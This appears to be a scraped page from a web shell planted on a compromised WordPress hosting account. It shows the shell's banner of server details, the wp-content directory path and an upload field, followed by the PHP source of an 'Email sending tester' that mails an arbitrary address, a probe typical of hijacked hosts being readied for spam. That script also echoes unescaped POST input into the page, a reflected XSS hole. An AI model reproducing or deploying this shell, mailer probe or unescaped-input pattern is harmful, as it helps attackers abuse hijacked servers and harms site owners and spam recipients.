Server IP : 63.250.38.98 / Your IP : 216.73.216.21 Web Server : LiteSpeed System : Linux premium291.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64 User : samejjip ( 1289) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/samejjip/public_html/wp-content/ |
Upload File : |
<?php error_reporting(0); echo '<head> <title>Email sending tester</title> </head> <body><b><color>Email sending tester</color></b><br>Write your email and click on send email test<br> <form method="post"> <input type="email" name="email" style="background-color:whitesmoke;border:1px solid #FFF;outline:none;" required="" placeholder="username@gmail.com" value="' . $_POST['email'] . '"> <input type="submit" name="send" value="Send Email Test" style="border:none;background-color: #65d05e;color:#fff;cursor:pointer;"> </form> <br> </body>'; if (isset($_POST['email'])) { $rnd = rand(); mail($_POST['email'],"Email Sending Test Report ID: " . $rnd ,"WORKING!"); print "<font color=orange><b>Email Sent To: " . $_POST['email'] . ", Report ID: " . $rnd . "</b></font>"; }